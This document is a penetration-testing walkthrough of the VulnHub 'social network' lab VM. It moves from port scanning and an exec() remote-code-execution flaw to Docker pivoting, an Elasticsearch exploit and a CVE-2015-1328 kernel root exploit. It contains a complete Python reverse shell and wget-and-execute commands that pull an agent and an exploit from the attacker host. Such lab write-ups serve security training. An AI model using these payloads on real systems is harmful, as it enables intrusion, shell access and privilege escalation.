Target Information

Target VM: medium_socnet Source: VulnHub (https://www.vulnhub.com/entry/boredhackerblog-social-network,454/)

Initial Reconnaissance

With both the target and the attack host (Kali) on the same network segment, arpscan was used to identify the target's IP address.

arpscan -l

From the results, 192.168.174.133 was identified as the target. A full port scan was then performed.

nmap -p- 192.168.174.133

Open ports were found. A service version detection scan was run on these ports.

nmap -p22,5000 -sV 192.168.174.133

The -sV flag in Nmap performs service version detection. It sends specific probes to open ports and analyzes responses to determine the exact service and version running. This is crucial for identifying potential vulnerabilities associated with specific software versions.

Results indicated an Ubuntu system running a Python HTTP service on port 5000.

Web Application Enumeration

The web service on port 5000 was accessed. No obvious injetcion points were found. A directory scan was performed using dirsearch.

dirsearch -u "http://192.168.174.133:5000/"

An admin panel path was discovered. This panel contained a feature that passed user input directly into an exec() function, leading to a Remote Code Execution (RCE) vulnerability.

Initial Foothold via RCE

A reverse shell was established using Python. First, a listener was started on the attack machine.

nc -lvvnp 6666

The following Python reverse shell payload was executed via the vulnerable web parameter.

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.174.128",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

A shell was successfully obtained.

Identifying a Docker Container

The presence of a Dockerfile suggested the shell was inside a container. Two methods confirmed this:

1. Checking for the .dockerenv file.

ls /.dockerenv

2. Examining the cgroup information.

cat /proc/1/cgroup

The container's internal IP was 172.17.0.3/16.

Internal Network Discovery

The internal Docker network (172.17.0.0/16) was probed to find other hosts.

for ip in $(seq 1 10); do ping -c 1 172.17.0.$ip; done

This Bash loop pings IP addresses from 172.17.0.1 to 172.17.0.10. The ping -c 1 command sends a single ICMP echo request to each address. Hosts at 172.17.0.1 and 172.17.0.2 responded.

Pivoting with a Tunnel

To route traffic into this internal network, Venom (v1.1.0) was used to establish a tunnel.

1. The Venom server was started on the attack host (Kali) on port 9999.
2. An HTTP server was started on Kali to host the Venom agent.

python3 -m http.server 80

3. From the compromised container, the agent was downloaded and executed.

wget http://192.168.174.128/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.174.128 -rport 9999

4. On the Kali server session, the connection was accepted and a SOCKS5 proxy was started on port 1080.

 goto 1
 socks 1080

5. proxychains4 was configured to route tools through this proxy by editing /etc/proxychains4.conf.

Internal Service Enumeration

With the proxy active, internal hosts were scanned.

proxychains nmap -Pn -sT -sV 172.17.0.1
proxychains nmap -Pn -sT -sV 172.17.0.2

• -Pn: Skips host discovery (no ping).
• -sT: Uses a full TCP connect scan.
• -sV: Performs service version detection.

Host 172.17.0.2 was running Elasticsearch on port 9200.

Exploiting Elasticsearch

Searchsploit was used to find Elasticsearch exploits.

searchsploit elasticsearch

A relevant Python 2 exploit was copied and executed through the proxy.

cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
proxychains python2 36337.py 172.17.0.2

The exploit succeeded, yielding a file containing a hashed password. The hash was cracked using an online service (e.g., Somd5), revealing the password for a user john.

Lateral Movement via SSH

The credentials were used to SSH into the host at 172.17.0.1 (the original target's internal interface).

proxychains ssh john@172.17.0.1

Access was gained as the john user.

Privilege Escalation

The kernel version was checked and found to be vulnerable.

searchsploit "Linux 3.13.0" ubuntu

A local privilege escalation exploit (CVE-2015-1328) was identified. The exploit code (37292.c) required compilation. As the target lacked gcc, it was compiled on Kali.

gcc -o privilege_escalation 37292.c

A required shared library (ofs-lib.so) was located and copied.

cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

Both files were hosted via a Python HTTP server and downloaded to the target's /tmp directory.

# On Kali
python3 -m http.server 80

# On target (as john)
cd /tmp
wget http://192.168.174.128/privilege_escalation
wget http://192.168.174.128/ofs-lib.so
chmod +x privilege_escalation
./privilege_escalation

The exploit executed successfully, granting root access.